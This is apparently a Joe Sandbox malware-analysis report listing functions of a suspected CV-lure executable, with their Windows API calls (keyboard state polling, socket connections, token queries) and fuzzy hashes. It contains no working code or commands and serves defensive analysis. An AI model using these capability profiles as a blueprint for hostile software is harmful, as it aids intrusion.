Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e31ce84001e213afd7e5c5bef26b61cbfc99b1f9b3cf371b01217504d6cd0d57
Instruction ID: a0e83aeb9f7153ecfbbcc2d607c52cc9e64cf404fa9988160917f8bceff2b19a
Opcode Fuzzy Hash: e31ce84001e213afd7e5c5bef26b61cbfc99b1f9b3cf371b01217504d6cd0d57
Instruction Fuzzy Hash: 6241D439910304AFC722DB28CC45FA9BBB8EB0931AF161225ED19E72F1C630AD45CA90

Function 00341206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003412B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003412DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0034131C

Part of subcall function 002F936C: __swprintf.LIBCMT ref: 002F93AB
Part of subcall function 002F936C: __itow.LIBCMT ref: 002F93DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00341341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00341349

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 050700970fb07c5c90c8690f0b950a11d486b1c25d15a1afffa6d965f1919ad8
Instruction ID: 16d2e25299fc894d84665a1698bb29bcde7707cd49b6dbfe235d2ea263ce9e2a
Opcode Fuzzy Hash: 050700970fb07c5c90c8690f0b950a11d486b1c25d15a1afffa6d965f1919ad8
Instruction Fuzzy Hash: B8410C35600509DFDB01EF64C991AAEBBF5FF08314B1480A9E90AAB3A2CB31ED51DF50

Function 0030B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 0030B64F
ScreenToClient.USER32(00000000,000000FF), ref: 0030B66C
GetAsyncKeyState.USER32(00000001), ref: 0030B691
GetAsyncKeyState.USER32(00000002), ref: 0030B69F

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: f07edfd9c86dd71d9c999b75ed9996ad819a40738ccbdc1325f109e3bb538cd6
Instruction ID: fef4a9988ba36ea56749354dbe371799a65523385324040eb502307a9e62b7ea
Opcode Fuzzy Hash: f07edfd9c86dd71d9c999b75ed9996ad819a40738ccbdc1325f109e3bb538cd6
Instruction Fuzzy Hash: A5415035A05119BBDF169F64C854EE9FB74BF05324F108319E829AA2D0CB31A994DF91

Function 0032B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0032B369
PostMessageW.USER32(?,00000201,00000001), ref: 0032B413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0032B41B
PostMessageW.USER32(?,00000202,00000000), ref: 0032B429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0032B431

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 5d884d793f96e00428ee9bbe109997bba323692a0c9f02020838a459e80b0d42
Instruction ID: 41170a3c4b4b583debcaca07fa1e75c661aab50f19f21b696e2db1c98782c012
Opcode Fuzzy Hash: 5d884d793f96e00428ee9bbe109997bba323692a0c9f02020838a459e80b0d42
Instruction Fuzzy Hash: AD31A071900229EBDF15CF68ED4DA9E7BB9EF04325F114229F925AA1D1C3B09954CB90

Function 0032DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0032DBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0032DBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0032DC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0032DC52
_wcsstr.LIBCMT ref: 0032DC5C

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 285870adbfb96ce5260bbe8c3086ada9e8a2fb5650dc96b10308e17017d3ca14
Instruction ID: d5e96685d7ddc410a93850b727e1ff1bd8abd9fa251e8df002e4491795855fb2
Opcode Fuzzy Hash: 285870adbfb96ce5260bbe8c3086ada9e8a2fb5650dc96b10308e17017d3ca14
Instruction Fuzzy Hash: BE21F971204124BFEB275F39EC59E7B7BACDF45760F114039F809DA191EAA1DC41D6A0

Function 0032BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0032BC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0032BCC2
__itow.LIBCMT ref: 0032BCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0032BD00
__itow.LIBCMT ref: 0032BD11

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 1a526e6589ce7c149bec75c0132073b7c3f0d847929f05938abcd9f047024cbc
Instruction ID: e24336fa6a7176a5f01f453aecc56558e6872b064cef04ce40f3b0d6e80f45d7
Opcode Fuzzy Hash: 1a526e6589ce7c149bec75c0132073b7c3f0d847929f05938abcd9f047024cbc
Instruction Fuzzy Hash: 3021C6356006287BDB22AE659C46FDFFB7DEF4A750F400025FA09EB181DB70894587A1

Function 00336318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 002F50E6: _wcsncpy.LIBCMT ref: 002F50FA

GetFileAttributesW.KERNEL32(?,?,?,?,003360C3), ref: 00336369
GetLastError.KERNEL32(?,?,?,003360C3), ref: 00336374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003360C3), ref: 00336388
_wcsrchr.LIBCMT ref: 003363AA

Part of subcall function 00336318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003360C3), ref: 003363E0

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: 5bc2742d7fed24bda1a70e6304fdfa78263c4972729af4993b15e0768b51012b
Instruction ID: 7b08b0bfb77e969b58fcca15509855eabbefc2fdf99cc7aba648f5177d6151af
Opcode Fuzzy Hash: 5bc2742d7fed24bda1a70e6304fdfa78263c4972729af4993b15e0768b51012b
Instruction Fuzzy Hash: A721D8355152156FDB27AB74AC93FEA23ACEF093B0F108469F045DB0E1EF60D9C18A55

Function 00348B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0034A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0034A84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00348BD3
WSAGetLastError.WSOCK32(00000000), ref: 00348BE2
connect.WSOCK32(00000000,?,00000010), ref: 00348BFE

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 320a295d2c3fdea2d851d4ea5e85670f0f1a4b2dc47346a1a29b210b3764245e
Instruction ID: 8c418420bb511f4d94219a85a244f18b3c276fb842fb6b60b5db62564a774c9e
Opcode Fuzzy Hash: 320a295d2c3fdea2d851d4ea5e85670f0f1a4b2dc47346a1a29b210b3764245e
Instruction Fuzzy Hash: F5218C312002149FDB16AF68C88AF7EB7EDEF48760F044459F916AF2D2CB74AC418B61

Function 00348420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00348441
GetForegroundWindow.USER32 ref: 00348458
GetDC.USER32(00000000), ref: 00348494
GetPixel.GDI32(00000000,?,00000003), ref: 003484A0
ReleaseDC.USER32(00000000,00000003), ref: 003484DB

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 8223571edd2b235fe6605e2a6f893c1906d6882a76983e306b356d8076c5f155
Instruction ID: ff1e34c80baaeea4eb345d8932b7c6f0b3d2a0c8042323fd44b105b21a109cb8
Opcode Fuzzy Hash: 8223571edd2b235fe6605e2a6f893c1906d6882a76983e306b356d8076c5f155
Instruction Fuzzy Hash: F021A435A00204AFD711EFA5C885A6EB7F9EF48301F048479E9499B351DF70AC40CB50

Function 0030AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0030AFE3
SelectObject.GDI32(?,00000000), ref: 0030AFF2
BeginPath.GDI32(?), ref: 0030B009
SelectObject.GDI32(?,00000000), ref: 0030B033

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: d77d6565d8fe7e211942d319e817524bce0ee6c81f625fc68a9d4fb6f6470cbc
Instruction ID: 1107d73165b5f744f3d6587f8b4e16310316d85d0ffb36ca43a2681b187d76e4
Opcode Fuzzy Hash: d77d6565d8fe7e211942d319e817524bce0ee6c81f625fc68a9d4fb6f6470cbc
Instruction Fuzzy Hash: 682180B1801309EFDB23DF59EC687AA7B7CBB10759F54432AE925A61E0D3704885CF91

Function 0031217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 003121A9
CreateThread.KERNEL32(?,?,003122DF,00000000,?,?), ref: 003121ED
GetLastError.KERNEL32 ref: 003121F7
_free.LIBCMT ref: 00312200
__dosmaperr.LIBCMT ref: 0031220B

Part of subcall function 00317C0E: __getptd_noexit.LIBCMT ref: 00317C0E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: 706920b7ecdedf30aa82e698880a964b2e25b6ef084581e4a5835e60b50d77b7
Instruction ID: 6091ab3257215c205a1ea482fd67d46c1836faf386f680a4676f38c012a41574
Opcode Fuzzy Hash: 706920b7ecdedf30aa82e698880a964b2e25b6ef084581e4a5835e60b50d77b7
Instruction Fuzzy Hash: 2A11E5321043066FAB2BAFA49C42DDF3BA8EF0C760B150429F9148A141DB31C8E186A0

Function 0032ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0032ABD7
GetLastError.KERNEL32(?,0032A69F,?,?,?), ref: 0032ABE1
GetProcessHeap.KERNEL32(00000008,?,?,0032A69F,?,?,?), ref: 0032ABF0
HeapAlloc.KERNEL32(00000000,?,0032A69F,?,?,?), ref: 0032ABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0032AC0E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 8ab0f63cd9f99f53f80800ecdb043572c6b096b5f1700a5442b41a1a9101f383
Instruction ID: 4f031ccae8491bd78f2bb4463e34e033249350b075d5f3ed63075f16b06cc335
Opcode Fuzzy Hash: 8ab0f63cd9f99f53f80800ecdb043572c6b096b5f1700a5442b41a1a9101f383
Instruction Fuzzy Hash: 90013171200224BFDB224FA9EC48D6B7BBDEF89755B110429F549D3250DA71DC80CF61

Function 00337A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00337A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00337A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00337A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00337A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00337AD0

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 04b9de4f0e6504cb9dc6e1ced629bfcd4113a1eb62cd94b9ef79c198a7c892f0
Instruction ID: f74c26b2779e271aab1137e267709a758d4c3a2cb03158849394ae897d1caecd
Opcode Fuzzy Hash: 04b9de4f0e6504cb9dc6e1ced629bfcd4113a1eb62cd94b9ef79c198a7c892f0
Instruction Fuzzy Hash: 820129B1C04619EBCF22AFE4DC98AEDBB78FF08711F410455E502B2254DB309690C7A1

Function 00329ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00329ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 00329AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 00329B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00329B15
CLSIDFromString.OLE32(?,?), ref: 00329B21

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: e33ae97d771ec20a45b85a453dfbbe525aa33aac498e4e26220fb016aa2df0f8
Instruction ID: 3cf12eb53dd77b40d02e3aaf3f3b54d915edd70688960ecd36d556fb829b3b79
Opcode Fuzzy Hash: e33ae97d771ec20a45b85a453dfbbe525aa33aac498e4e26220fb016aa2df0f8
Instruction Fuzzy Hash: D301A276A00224BFDB224F54EC44B9A7BFDEF48751F144029F90AD6210D771DD409BA0

Function 0032AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0032AA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0032AA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0032AA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0032AA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0032AAAF

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 8b2e63543b13c125f9774d58216173146ba580a6eece59e6ffb5d4456b7496ca
Instruction ID: 7be0aaa2b9a82da87bccffcb100e32553842a79bcc482c22734408d75344b622
Opcode Fuzzy Hash: 8b2e63543b13c125f9774d58216173146ba580a6eece59e6ffb5d4456b7496ca
Instruction Fuzzy Hash: 41F04F75210214AFEB225FA4AC89F673BBCFF49754F100429F945D7190DB619C82CA61

Function 0032AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0032AADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0032AAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0032AAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0032AAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0032AB10

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: db5757f22a4843210951cb78625fe93654f743fb7655a3ed599af8004bd16e65
Instruction ID: a366436990be8a6784038a5fc2a5a64c8e67fc04c9acad88ea256c40ec06c63d
Opcode Fuzzy Hash: db5757f22a4843210951cb78625fe93654f743fb7655a3ed599af8004bd16e65
Instruction Fuzzy Hash: 2AF04F75200318AFEB220FA4EC88F673B7DFF46B54F100029F946D7190CA619841CA61

Function 0032EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0032EC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 0032ECAB
MessageBeep.USER32(00000000), ref: 0032ECC3
KillTimer.USER32(?,0000040A), ref: 0032ECDF
EndDialog.USER32(?,00000001), ref: 0032ECF9

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 397189711e76ffb0403e17bbe115cf742f745a96254dee17dfd8d8e4ab76dcef
Instruction ID: d22f18a39651967f5b57eca2d65fc2cd6bcd931dbe002b84f4e4ec5568b5cb91
Opcode Fuzzy Hash: 397189711e76ffb0403e17bbe115cf742f745a96254dee17dfd8d8e4ab76dcef
Instruction Fuzzy Hash: 9D016D30500724ABEB365B50EE5EB9677BCFF00B05F000559E686A54E0DBF0AA848B80

Function 0030B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0030B0BA
StrokeAndFillPath.GDI32(?,?,0036E680,00000000,?,?,?), ref: 0030B0D6
SelectObject.GDI32(?,00000000), ref: 0030B0E9
DeleteObject.GDI32 ref: 0030B0FC
StrokePath.GDI32(?), ref: 0030B117

